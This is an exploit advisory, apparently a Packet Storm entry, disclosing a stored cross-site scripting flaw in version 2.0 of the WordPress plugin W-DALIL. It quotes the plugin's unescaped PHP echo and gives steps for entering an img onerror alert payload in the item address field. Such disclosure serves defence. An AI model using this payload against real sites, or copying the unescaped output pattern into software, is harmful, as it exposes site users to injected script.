Share
## https://sploitus.com/exploit?id=PACKETSTORM:167595
# Exploit Title: WordPress Plugin W-DALIL - Stored Cross Site Scripting
# Date: 27-06-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/w-dalil/
# Version: 2.0
# Tested on: Firefox
# Contact me: mariamtariq404@gmail.com
#Vulnerable Code:
```
<input class="dalil_input" name="dalil-address" type="text"
placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"
value="<?php echo $dalil_information['dalil-address']; ?>" />
```
#Steps To Reproduce :
1 - First Install the plugin "*w-dalil*" and activate it.
2 - Go to Dalil โ> Add New Dalil item
3 - Inside the โ*Dalil item address*โ enter XSS payload โ*><img src=x
onerror=alert(1)>*" and hit enter.
#Poc Image :
https://imgur.com/JPG97oh